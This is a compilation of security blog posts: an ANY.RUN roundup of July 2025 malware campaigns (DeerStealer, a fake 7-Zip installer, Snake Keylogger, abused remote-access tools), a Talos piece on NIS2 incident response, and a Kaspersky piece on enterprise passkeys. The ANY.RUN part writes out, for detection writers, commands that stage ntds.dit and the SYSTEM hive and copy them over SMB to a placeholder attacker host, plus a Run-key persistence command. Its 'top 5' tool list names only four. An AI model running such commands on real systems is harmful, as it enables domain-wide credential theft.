Alongside the monthly top, we are highlighting a key trend that’s been powering campaigns throughout 2025: the top 5 Remote Access Tools most abused by threat actors in the first half of the year. 

The threats were investigated with ANY.RUN’s Interactive Sandbox, where you can trace the full attack chain and see malware behavior in action, and our Threat Intelligence Lookup (available now for free), which helps you turn raw IOCs into actionable intelligence to better protect your organization. 

DeerStealer Delivered via Obfuscated .LNK and LOLBin Abuse 

Post on X 

Detailed DeerStealer attack chain 

The recent phishing campaign delivers malware through a fake PDF shortcut (Report.lnk) that leverages mshta.exe for script execution, which is a known LOLBin technique (MITRE T1218.005).  

ANY.RUN’s Script Tracer reveals the full chain, including wildcard LOLBin execution, encoded payloads, and network exfiltration, without requiring manual deobfuscation.   

View analysis session in the Sandbox 

The attack begins with a .lnk file that covertly invokes mshta.exe to drop scripts for the next stages. The execution command is heavily obfuscated using wildcard paths. 

Fake Report.lnk detonated in the sandbox 

To evade signature-based detection, PowerShell dynamically resolves the full path to mshta.exe in the System32 directory. It is launched with flags, followed by obfuscated Base64 strings. Both logging and profiling are disabled to reduce forensic visibility during execution. 

Characters are decoded in pairs, converted from hex to ASCII, reassembled into a script, and executed via IEX. This ensures the malicious logic stays hidden until runtime.  

The script dynamically resolves URLs and binary content from obfuscated arrays, downloads a decoy PDF, writes the main executable into AppData, and silently runs it. The PDF is opened in Adobe Acrobat to distract the user.  
 
You can use Threat Intelligence Lookup to find malware samples using similar techniques with fake .lnk files and PowerShell commands to enrich your company’s detection systems.  
 
Search for suspicious shortcut attachments: threatName:"susp-lnk" 

Sandbox analyses of suspicious .lnk files 

Query TI Lookup for a snippet in a PowerShell command: commandLine:"| IEX" 

PowerShell command search results 

IOCs for threat detection and research:  

  • https[:]//tripplefury[.]com/ 
  • fd5a2f9eed065c5767d5323b8dd928ef8724ea2edeba3e4c83e211edf9ff0160 
  • 8f49254064d534459b7ec60bf4e21f75284fbabfaea511268c478e15f1ed0db9 

Speed up triage and incident response
with instant access to live attack data from 15K SOCs 



Try TI Lookup. It’s free!


ANY.RUN’s analysts were among the first to research a DeerStealer distribution campaign when it had just emerged: read the article in our blog and keep an eye on this malware.  

Fake 7-Zip installer exfiltrates Active Directory files 

Post on X 

A malicious installer disguised as 7-Zip steals critical Active Directory files, including ntds.dit and the SYSTEM hive, by leveraging shadow copies and exfiltrating the data to a remote server. 

Upon execution, the malware creates a shadow copy of the system drive to bypass file locks and extract protected files without disrupting system operations. It then copies ntds.dit, which contains Active Directory user and group data, and SYSTEM, which holds the corresponding encryption keys. 

The malware connects to a remote server via SMB using hardcoded credentials. All output is redirected to NUL to minimize traces. 

This technique grants the attacker full access to the ntds.dit dump, allowing them to extract credentials for Active Directory objects and enabling lateral movement techniques such as Pass-the-Hash or Golden Ticket. 
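For defenders writing detections, the behavior described above maps to a well-known command pattern. The sketch below is a generic illustration of the technique rather than the sample’s exact commands; the staging paths, server address, and credentials are placeholders: 

REM Create a shadow copy so locked files can be read
vssadmin create shadow /for=C:
REM Stage the AD database and the SYSTEM hive from the shadow copy
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ProgramData\nt.dit > NUL
reg save HKLM\SYSTEM C:\ProgramData\sys.hiv > NUL
REM Exfiltrate over SMB using hardcoded credentials
net use \\203.0.113.5\share Passw0rd! /user:attacker
copy C:\ProgramData\*.* \\203.0.113.5\share\ > NUL

Hunting for vssadmin create shadow followed shortly by access to ntds.dit or a reg save of HKLM\SYSTEM is a reliable way to surface this credential-staging pattern. 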
 
ANY.RUN’s Sandbox makes it easy to detect these stealthy operations by providing full behavioral visibility, from network exfiltration to credential staging, within a single interactive session. 

View an example of such a session 

Malicious processes shaping the attack chain, visible in Sandbox analyses 

Look the malicious file up by its hash to analyze similar attacks and gather IOCs:  

sha256:”17a5512e09311e10465f432e1a093cd484bbd4b63b3fb25e6fbb1861a2a3520b” 

Samples with the same file in the Sandbox 

Control-Flow Flattening Obfuscated JavaScript Drops Snake Keylogger 

Post on X 

As our data shows, banking is the most affected sector among our users, nearly matching all the other industries combined. As part of widespread MaaS phishing campaigns, Snake targets high-value industries including fintech, healthcare, and energy, making instant threat visibility and behavioral analysis essential. 

In this attack, the malware uses layered obfuscation to hide execution logic and evade traditional detection. 

See execution on a live system and download actionable report: 

Snake Keylogger analysis in ANY.RUN’s Sandbox 

The attack begins with a loader using control-flow flattening (MITRE T1027.010) to obscure its logic behind nested while-loops and string shifts. 

The loader uses COM automation via WshShell3, avoiding direct PowerShell or CMD calls and bypassing common detection rules.  

Obfuscated CMD scripts include non-ASCII (Japanese) characters and environment variables like %…%, further complicating static and dynamic analysis. 

Two CMD scripts are dropped into ProgramData to prepare the execution environment. This stage involves LOLBAS abuse: legitimate DLLs are copied from SysWOW64 into “/Windows /” and Public directories. The operation is performed using extrac32.exe, a known LOLBin, together with JS script functionality. This combination helps bypass detection by imitating trusted system behavior.  

Persistence is established by creating a Run registry key pointing to a .url file containing the execution path. Snake is then launched after a short PING-induced delay, staggering execution. 
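As a rough illustration for detection purposes, the persistence and delay steps boil down to something like the sketch below (the file path and delay length are placeholders; the value name comes from this campaign’s IOC list): 

REM Persistence: Run key pointing to a .url file that holds the execution path
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Iaakcppq /t REG_SZ /d "C:\Users\Public\Iaakcppq.url"
REM A PING against localhost acts as a crude sleep that staggers execution
ping 127.0.0.1 -n 15 > nul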
 
Explore ANY.RUN’s threat database to proactively hunt for similar threats and techniques and improve the precision and efficiency of your organization’s security response. Here are several examples of Threat Intelligence Lookup search requests that let you discover malware samples using the TTPs described above:  

Lookup by registry modification artifacts 
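For example, pivoting on the persistence artifact from this campaign (the field syntax follows the TI Lookup queries shown earlier): 

registryValue:"Iaakcppq.url"

This surfaces other sandbox sessions where the same .url persistence value was written, along with their IOCs. 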

IOCs:  

  • 54fcf77b7b6ca66ea4a2719b3209f18409edea8e7e7514cf85dc6bcde0745403  
  • ae53759b1047c267da1e068d1e14822d158e045c6a81e4bf114bd9981473abbd  
  • efd8444c42d4388251d4bc477fb712986676bc1752f30c9ad89ded67462a59a0  
  • dbe81bbd0c3f8cb44eb45cd4d3669bd72bf95003804328d8f02417c2df49c481 
  • 183e98cd972ec4e2ff66b9503559e188a040532464ee4f979f704aa5224f4976 
  • reallyfreegeoip[.]org  
  • 104[.]21[.]96[.]1  
  • https[:]//reallyfreegeoip[.]org/xml/78[.]88[.]249[.]143  
  • registryValue: Iaakcppq.url 

Snake Keylogger attack chain 

Top 5 Remote Access Tools Exploited by Threat Actors in the First Half of 2025 

Post on X  

While legitimate and widely used by IT teams, Remote Monitoring and Management (RMM) tools are increasingly abused by threat actors to establish persistence, bypass defenses, and exfiltrate data. 
 
In the first half of 2025, ANY.RUN observed a significant number of malware samples leveraging known RMM software for malicious access. Here are the 5 most frequently abused tools illustrated with sandbox malware sample analyses: 

  • ScreenConnect – 3,829 sandbox analyses, view one
  • UltraVNC – 2,117 sandbox analyses, view one
  • PDQ Connect – 230 sandbox analyses, view one
  • Atera – 171 sandbox analyses, view one

RMM H1 2025 by Sandbox sample uploads 

To support faster detection and investigation, we’ve added the rmm-tool tag in Threat Intelligence Lookup, making it easier for threat hunters and incident responders to track RMM-based intrusions. Use the “threatName” search parameter to sort out sandbox sessions featuring remote access software and malware.  
 
threatName:"rmm-tool" 

Recent RMM abuse cases in the last 180 days 

Actionable Summary: From Visibility to Security 

The attacks we’ve reviewed this month showcase the growing sophistication and stealth of threat actors — from abusing LOLBins and fake installers to hijacking legitimate RMM tools. Detecting, understanding, and responding to such threats demands more than just static indicators. It requires deep behavioral insight and high-fidelity threat intelligence. 
 
View June’s top threats analysis to compare trends and broaden your understanding of the threat landscape.  

ANY.RUN’s Interactive Sandbox empowers malware analysts to dissect the full attack chain, observe real payload execution, and uncover hidden behaviors without getting lost in obfuscation or waiting for post-mortem reports. You don’t just watch malware — you watch it work. 

Meanwhile, Threat Intelligence Lookup helps you connect the dots across thousands of similar cases: identify recurring tactics, extract IOC patterns, and enrich detection rules with real, contextualized data. Whether you’re tracing fake .lnk campaigns or hunting RMM-based persistence, it gives you a shortcut to actionable answers. 

As attackers get bolder, your investigation workflow has to get smarter — and faster. ANY.RUN is here to support both. 

About ANY.RUN 

ANY.RUN supports over 15,000 organizations across industries such as banking, manufacturing, telecommunications, healthcare, retail, and technology, helping them build stronger and more resilient cybersecurity operations.   

Designed to accelerate threat detection and improve response times, ANY.RUN equips teams with interactive malware analysis capabilities and real-time threat intelligence. 

Integrate ANY.RUN’s Threat Intelligence suite in your organization 

The post Major Cyber Attacks in July 2025: Obfuscated .LNK‑Delivered DeerStealer, Fake 7‑Zip, and More appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Insights from Talos IR: Navigating NIS2 technical implementation

Insights from Talos IR: Navigating NIS2 technical implementation

When the NIS2 Directive arrived in 2023, organizations across Europe began preparing for enhanced cybersecurity requirements. Many focused on obligations such as rapid incident notifications and comprehensive security policies. However, while the directive provided the “what,” it left the “how” largely undefined. Organizations understood that they needed incident response capabilities and swift reporting mechanisms, but the details of implementation remained unclear.  

The release of ENISA’s Technical Implementation Guidance in June 2025 revealed the true complexity of NIS2 compliance. The guidance spells out requirements that fundamentally challenge conventional security operations, particularly during incidents. Organizations that once prioritized operational continuity over forensic response and detailed analysis must now balance all three.

Competing objectives in incident response 

Under the old approach, organizations had the flexibility to isolate, investigate and report incidents at their own pace. These processes were typically dictated by business needs, with exceptions when personal data was involved under GDPR. 

Now, the clock starts ticking toward a 24-hour deadline from the moment an incident happens (Article 23 of the NIS2 Directive). 

The incident response procedures outlined in Section 3.5.2 of the ENISA guidance illustrate this shift perfectly. Security teams must now “recognize and address potential conflicts between forensic activities, incident response activities, and operational continuity.” The guidance explicitly acknowledges that teams face competing objectives: 

  1. Preserve evidence for legal purposes 
  2. Mitigate current threats to minimize business disruption 
  3. Minimize IT service downtime to maintain operational continuity 

Traditional incident response playbooks assume you can prioritize one or two of these objectives. NIS2 demands all three simultaneously. 

Let’s consider an example. A ransomware attack hits payment processing systems at midnight. According to Section 3.2.3, teams must maintain comprehensive logs including “all privileged access to systems and applications and activities performed by administrative accounts,” while Section 3.5.4 requires logging all incident response activities and recording evidence. At the same time, the business operations would require system restoration to process morning transactions so that the bottom line is not impacted.  

Throughout this process, someone must compile an initial report meeting the notification requirements within 24 hours as mandated by Article 23(3) of the NIS2 Directive. This is followed by a more detailed report with impact assessment details within 72 hours. Not to mention, organizations operating across borders may need country-specific procedures to support notification timelines.   

The guidance acknowledges the inherent conflict in these objectives and requires organizations to “establish a clear decision-making process that prioritizes based on the accepted risk tolerance levels, business impact and legal obligations.”

Logging requirements 

Another key challenge lies in the depth of logging required. Section 3.2.3 specifies that logs shall include, where appropriate: “(a) relevant outbound and inbound network traffic; (b) creation, modification or deletion of users of the relevant entities’ network and information systems and extension of the permissions; (c) access to systems and applications; (d) authentication-related events; (e) all privileged access to systems and applications and activities performed by administrative accounts” as well as 7 additional categories, for 12 total. All this assumes visibility into shadow IT and appropriate configuration of user activity tracking so that a proper audit trail can be constructed, reviewed and stored for analysis.  

Furthermore, the guidance notes in Section 3.2.6 that monitoring and logging systems must be redundant, and that “the availability of the monitoring and logging systems shall be monitored independent of the systems they are monitoring.” Although this is music to an incident responder’s ears, setting up the complex systems needed to correlate, analyze, store and retrieve detailed audits is a significant challenge.

Forensic activities vs. business recovery 

Traditional incident response strategies often prioritize rapid recovery so that business operations can return to normal while evidence is analyzed in parallel. Incident response teams often want to acquire all evidence upfront so that business recovery can begin alongside the forensic investigation. The business can also decide what to recover, or even make the decision to rebuild the environment from scratch and thus accelerate recovery and eradication. 

Section 3.5.2 explicitly calls for creation of a playbook to ensure that evidence handling, incident response and threat eradication take place during appropriate stages of the business cycle. The playbook must manage tradeoffs so that there is no impact on preservation of evidence for compliance and legal purposes. 

In addition, Section 3.5.4 mandates that entities “log incident response activities” and “record evidence.” The guidance suggests this should include “time of detection, containment and eradication,” “indicators of compromise,” “root cause” and “actions taken during each phase.” To meet this requirement, organizations must develop procedures that capture this critical information while managing active incidents. Typically, incident response teams already do this when creating a detailed timeline of all activities. Close collaboration between business stakeholders and IR teams is a must for NIS2 compliance.

Looking beyond compliance 

While the guidance focuses on meeting technical requirements, organizations that implement these capabilities also gain broader operational benefits. For example, comprehensive logging not only satisfies compliance, but also supports threat hunting and delivers valuable operational insights. With these capabilities, IR teams can review the environment for malicious activities. Enhanced monitoring, especially when automated, can identify security incidents quicker and reduce adversary dwell time.  

Structured incident response procedures improve overall operational resilience by ensuring every team member knows what to do and when to act. Talos IR services directly align with these key ENISA Technical Implementation Guidance requirements, helping organizations bridge the gap between current capabilities and NIS2 compliance. 

Log Architecture Assessment (Section 3.2 Requirements) 

Section 3.2.3  mandates logging across 12 categories of events “where appropriate,” while Section 3.2.6 requires redundant logging systems with synchronized time sources. Talos IR’s Log Architecture Assessment evaluates current logging capabilities against best practices, identifying deficiencies and providing a roadmap to strengthen an organization’s logging posture. 

Incident Response Playbooks (Section 3.5.2 Requirements)  

Perhaps the most challenging aspect of the NIS2 is the explicit requirement for “incident response playbooks that incorporate decision making and escalation paths for managing trade-offs between evidence preservation, threat containment and operational continuity.” Talos IR develops customized playbooks that address these competing priorities, giving your team a clear process tailored for each incident type.  

Incident Response Plans (Section 3.1 and 3.5 Requirements) 

Section 3.1.1 requires establishing comprehensive “procedures for detecting, analyzing, containing or responding to, recovering from, documenting and reporting of incidents.” Talos IR helps organizations develop IR plans that reflect their internal processes and operational needs. 

Threat Hunting and Compromise Assessments (Section 3.4 Requirements) 

Section 3.4.1 requires organizations to assess “suspicious events to determine whether they constitute incidents.” Talos IR provides proactive Threat Hunting and Compromise Assessment services to identify suspicious events before they escalate into major incidents. We look to answer critical questions such as “Am I currently compromised?” or “Is there any evidence of historical compromise?” 

Incident Support (Section 3.6 Requirements) 

Talos IR provides 24/7 incident support to help organizations respond swiftly and effectively during emergencies. Our team engages quickly to understand the situation, address immediate concerns and analyze threats. In addition to deep forensic expertise, Talos IR provides comprehensive root cause analysis and actionable recommendations that transform each incident into an opportunity to strengthen the organization’s security posture.

Cisco Talos Blog – ​Read More

Are passkeys enterprise-ready? | Kaspersky official blog

Every major tech giant touts passkeys as an effective, convenient password replacement that can end phishing and credential leaks. The core idea is simple: you sign in with a cryptographic key that’s stored securely in a special hardware module on your device, and you unlock that key with biometrics or a PIN. We’ve already covered the current state of passkeys for home users in detail across two articles: one on terminology and basic use cases, and another on more complex scenarios. However, businesses have entirely different requirements and approaches to cybersecurity. So, how good are passkeys and FIDO2 WebAuthn in a corporate environment?

Reasons for companies to switch to passkeys

As with any large-scale migration, making the switch to passkeys requires a solid business case. On paper, passkeys tackle several pressing problems at once:

  • Lower the risk of breaches caused by stolen legitimate credentials — phishing resistance is the top advertised benefit of passkeys.
  • Strengthen defenses against other identity attacks, such as brute-forcing and credential stuffing.
  • Help with compliance. In many industries, regulators mandate the use of robust authentication methods for employees, and passkeys usually qualify.
  • Reduce costs. If a company opts for passkeys stored on laptops or smartphones, it can achieve a high level of security without the extra expense of USB devices, smart cards, and their associated management and logistics.
  • Boost employee productivity. A smooth, efficient authentication process saves every employee time daily and reduces failed login attempts. Switching to passkeys usually goes hand in hand with getting rid of the universally loathed regular password changes.
  • Lighten the helpdesk workload by decreasing the number of tickets related to forgotten passwords and locked accounts. (Of course, other types of issues pop up instead, such as lost devices containing passkeys.)

How widespread is passkey adoption?

A FIDO Alliance report suggests that 87% of surveyed organizations in the US and UK have either already transitioned to using passkeys or are currently in the process of doing so. However, a closer look at the report reveals that this impressive figure also includes the familiar enterprise options like smart cards and USB tokens for account access. Although some of these are indeed based on WebAuthn and passkeys, they’re not without their problems. They’re quite expensive and create an ongoing burden on IT and cybersecurity teams related to managing physical tokens and cards: issuance, delivery, replacement, revocation, and so on. As for the heavily promoted solutions based on smartphones and even cloud sync, 63% of respondents reported using such technologies, but the full extent of their adoption remains unclear.

Companies that transition their entire workforce to the new tech are few and far between. The process can get both organizationally challenging and just plain expensive. More often than not, the rollout is done in phases. Although pilot strategies may vary, companies typically start with those employees who have access to IP (39%), IT system admins (39%), and C-suite executives (34%).

Potential obstacles to passkey adoption

When an organization decides to transition to passkeys, it will inevitably face a host of technical challenges. These alone could warrant their own article. But for this piece, let’s stick to the most obvious issues:

  • Difficulty (and sometimes outright impossibility) of migrating to passkeys when using legacy and isolated IT systems — especially on-premises Active Directory
  • Fragmentation of passkey storage approaches within the Apple, Google, and Microsoft ecosystems, complicating the use of a single passkey across different devices
  • Additional management difficulties if the company allows the use of personal devices (BYOD), or, conversely, has strict prohibitions such as banning Bluetooth
  • Ongoing costs for purchasing or leasing tokens and managing physical devices
  • Specific requirement of non-syncable hardware keys for high-assurance-with-attestation scenarios (and even then, not all of them qualify — the FIDO Alliance provides specific recommendations on this)
  • Necessity to train employees and address their concerns about the use of biometrics
  • Necessity to create new, detailed policies for IT, cybersecurity, and the helpdesk to address issues related to fragmentation, legacy systems, and lost devices (including issues related to onboarding and offboarding procedures)

What do regulators say about passkeys?

Despite all these challenges, the transition to passkeys may be a foregone conclusion for some organizations if required by a regulator. Major national and industry regulators generally support passkeys, either directly or indirectly:

The NIST SP 800-63 Digital Identity Guidelines permit the use of “syncable authenticators” (a definition that clearly implies passkeys) for Authenticator Assurance Level 2, and device-bound authenticators for Authenticator Assurance Level 3. Thus, the use of passkeys confidently checks the boxes during ISO 27001, HIPAA, and SOC 2 audits.

In its commentary on DSS 4.0.1, the PCI Security Standards Council explicitly names FIDO2 as a technology that meets its criteria for “phishing-resistant authentication”.

The EU Payment Services Directive 2 (PSD2) is written in a technology-agnostic manner. However, it requires Strong Customer Authentication (SCA) and the use of Public Key Infrastructure based devices for important financial transactions, as well as dynamic linking of payment data with the transaction signature. Passkeys support these requirements.

The European directives DORA and NIS2 are also technology-agnostic, and generally only require the implementation of multi-factor authentication — a requirement that passkeys certainly satisfy.

In short, choosing passkeys specifically isn’t mandatory for regulatory compliance, but many organizations find it to be the most cost-effective path. Among the factors tipping the scales in favor of passkeys are the extensive use of cloud services and SaaS, an ongoing rollout of passkeys for customer-facing websites and apps, and a well-managed fleet of corporate computers and smartphones.

Enterprise roadmap for transitioning to passkeys

  1. Assemble a cross-functional team. This includes IT, cybersecurity, business owners of IT systems, tech support, HR, and internal communications.
  2. Inventory your authentication systems and methods. Identify where WebAuthn/FIDO2 is already supported, which systems can be upgraded, where single sign-on (SSO) integration can be implemented, where a dedicated service needs to be created to translate new authentication methods into ones your systems support, and where you’ll have to continue using passwords — under beefed-up SOC monitoring.
  3. Define your passkey strategy. Decide whether to use hardware security keys or passkeys stored on smartphones and laptops. Plan and configure your primary sign-in methods, as well as emergency access options such as temporary access passcodes (TAP).
  4. Update your corporate information security policies to reflect the adoption of passkeys. Establish detailed sign-up and recovery rules. Establish protocols for cases where transitioning to passkeys isn’t on the cards (for example, because the user must rely on a legacy device that has no passkey support). Develop auxiliary measures to ensure secure passkey storage, such as mandatory device encryption, biometrics use, and unified endpoint management or enterprise mobility management device health checks.
  5. Plan the rollout order for different systems and user groups. Set a long timeline to identify and fix problems step-by-step.
  6. Enable passkeys in access management systems such as Entra ID and Google Workspace, and configure allowed devices.
  7. Launch a pilot, starting with a small group of users. Collect feedback, and refine your instructions and approach.
  8. Gradually connect systems that don’t natively support passkeys using SSO and other methods.
  9. Train your employees. Launch a passkey adoption campaign, providing users with clear instructions and working with “champions” on each team to speed up the transition.
  10. Track progress and improve processes. Analyze usage metrics, login errors, and support tickets. Adjust access and recovery policies accordingly.
  11. Gradually phase out legacy authentication methods once their usage drops to single-digit rates. First and foremost, eliminate one-time codes sent through insecure communication channels, such as text messages and email.

Kaspersky official blog – ​Read More